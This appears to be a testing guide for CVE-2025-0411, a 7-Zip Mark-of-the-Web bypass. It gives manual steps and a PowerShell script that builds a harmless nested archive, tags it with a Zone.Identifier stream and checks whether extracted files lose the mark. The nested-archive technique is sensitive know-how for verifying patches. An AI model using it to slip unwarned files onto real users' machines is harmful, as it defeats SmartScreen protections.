Bypassing Mark of the Web with 7zip CVE-2025-0411
Introduction
CVE-2025-0411 is a Mark-of-the-Web (MoTW) bypass in 7-Zip. It allows remote attackers to bypass the MoTW protection mechanism on affected installations; user interaction is required, in that the target must visit a malicious page or open a malicious file. The flaw exists in the handling of archived files: when extracting files from a crafted archive that bears the MoTW, 7-Zip 24.08 and earlier do not propagate the MoTW (the Zone.Identifier alternate data stream) to the extracted files. In the publicly documented cases the crafted archive is a nested archive, an archive inside a MoTW-tagged archive, and the files extracted from the inner archive come out unmarked, so Windows SmartScreen and the "Open File - Security Warning" prompt never see them. An attacker can leverage this to execute arbitrary code in the context of the current user. The issue was fixed in 7-Zip 24.09 and was tracked by ZDI as ZDI-CAN-25456.
Exploitation Steps
Testing for CVE-2025-0411 on a Windows Machine:
Prerequisites:
A Windows machine with a vulnerable version of 7-Zip (24.08 or earlier; the fix shipped in 24.09).
A crafted archive designed to exploit CVE-2025-0411: a MoTW-tagged outer archive that contains an inner archive, which in turn contains the test payload. Use a harmless payload (for example a text file or a script that only prints a message); the test is about whether the mark survives extraction, not about running anything dangerous.
Steps:
Prepare the Environment:
Confirm that 7-Zip 24.08 or earlier is installed (Help > About in 7-Zip File Manager, or check the version in Programs and Features).
Obtain or build the crafted (nested) archive. The outer archive must carry the MoTW when the test runs; the inner archive is what triggers the missing propagation.
Conduct the Test:
Get the crafted archive onto the machine in a way that applies the MoTW: download it from an external source via a web browser, or, in a lab, write the Zone.Identifier stream (ZoneId=3) to the archive yourself.
Right-click the downloaded archive, select "Properties," and verify the MoTW is present: the General tab shows the message "This file came from another computer and might be blocked to help protect this computer" together with an "Unblock" checkbox.
Extract the archive with 7-Zip File Manager (7zFM.exe), including the inner archive, into an empty folder.
Right-click the extracted files, select "Properties," and check whether the MoTW message and "Unblock" checkbox are absent. The outer archive's direct contents may still be marked; the files that came out of the inner archive are the ones to inspect.
Open one of the extracted payload files. If it runs without the SmartScreen or "Open File - Security Warning" prompt that a downloaded file normally triggers, the MoTW was not propagated and the bypass is confirmed. Repeat the same steps on 7-Zip 24.09 or later to confirm the extracted files keep the mark.
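The following PowerShell is an added example and not part of the original page or of 7-Zip itself. It automates the staging and checking parts of the procedure above: it builds a nested test archive with the 7z.exe command line, tags the outer archive with the Mark-of-the-Web the way a browser download would, and, after you have extracted the archive with 7-Zip File Manager, reports which extracted files lost the mark by reading the Zone.Identifier stream directly instead of through the Properties dialog. The lab directory, file names and the 7z.exe install path are assumptions.

```powershell
# Added example (not from the original page). Assumes 7-Zip is installed in the
# default location and that C:\lab is a scratch directory you control.
$SevenZip = Join-Path $env:ProgramFiles '7-Zip\7z.exe'   # assumed install path
$Lab      = 'C:\lab'                                      # hypothetical lab dir

# Build a harmless nested archive: payload.txt -> inner.7z -> outer.7z.
# A text file is enough to observe whether the mark is propagated.
function New-NestedTestArchive {
    param([string]$Directory = $Lab)
    New-Item -ItemType Directory -Path $Directory -Force | Out-Null
    $payload = Join-Path $Directory 'payload.txt'
    $inner   = Join-Path $Directory 'inner.7z'
    $outer   = Join-Path $Directory 'outer.7z'
    Set-Content -Path $payload -Value 'MoTW propagation test payload'
    & $SevenZip a -y $inner $payload | Out-Null   # inner archive holds the payload
    & $SevenZip a -y $outer $inner   | Out-Null   # outer archive holds the inner one
    return $outer
}

# Write the Zone.Identifier alternate data stream with ZoneId=3 (Internet zone).
# This is the same stream a browser adds to a download, so it stands in for
# the "download from an external source" step in a lab.
function Set-MotW {
    param([Parameter(Mandatory)][string]$Path)
    Set-Content -Path $Path -Stream Zone.Identifier -Value "[ZoneTransfer]`r`nZoneId=3"
}

# True if the file carries a Zone.Identifier stream with ZoneId 3 (Internet)
# or 4 (Restricted); false if the stream is missing or names a local zone.
function Test-MotW {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $zone = Get-Content -Path $Path -Stream Zone.Identifier -ErrorAction Stop
        return [bool]($zone -match '^ZoneId=[34]')
    } catch {
        return $false   # no Zone.Identifier stream on this file
    }
}

# One row per file under the extraction directory, with its MoTW status.
function Get-MotWReport {
    param([Parameter(Mandatory)][string]$Directory)
    Get-ChildItem -Path $Directory -File -Recurse | ForEach-Object {
        [pscustomobject]@{
            File    = $_.FullName
            HasMotW = Test-MotW -Path $_.FullName
        }
    }
}

# --- Stage the test ---
$outer = New-NestedTestArchive
Set-MotW -Path $outer
"Outer archive marked: $(Test-MotW -Path $outer)"

# --- Manual step ---
# Extract $outer with 7-Zip File Manager (7zFM.exe) into C:\lab\extracted, then
# extract the inner.7z it produced into the same folder. The propagation under
# test happens inside 7-Zip's own extraction, so it is not scripted here.
Read-Host 'Extract outer.7z (and then inner.7z) with 7-Zip File Manager into C:\lab\extracted, then press Enter'

# --- Check the result ---
$report = Get-MotWReport -Directory (Join-Path $Lab 'extracted')
$report | Format-Table -AutoSize
$lost = $report | Where-Object { -not $_.HasMotW }
if ($lost) {
    Write-Warning "Mark-of-the-Web missing on $($lost.Count) extracted file(s): 7-Zip did not propagate it"
} else {
    'All extracted files carry the Mark-of-the-Web'
}
```

On a vulnerable 7-Zip (24.08 or earlier) the report should show HasMotW = False for payload.txt once it has come out of the inner archive, while the same run on 24.09 or later should show the mark retained. Test-MotW is also a quicker replacement for the Properties-dialog check in the steps above: `Get-Item -Path <file> -Stream *` lists every alternate data stream on a file if you want to see the raw Zone.Identifier contents.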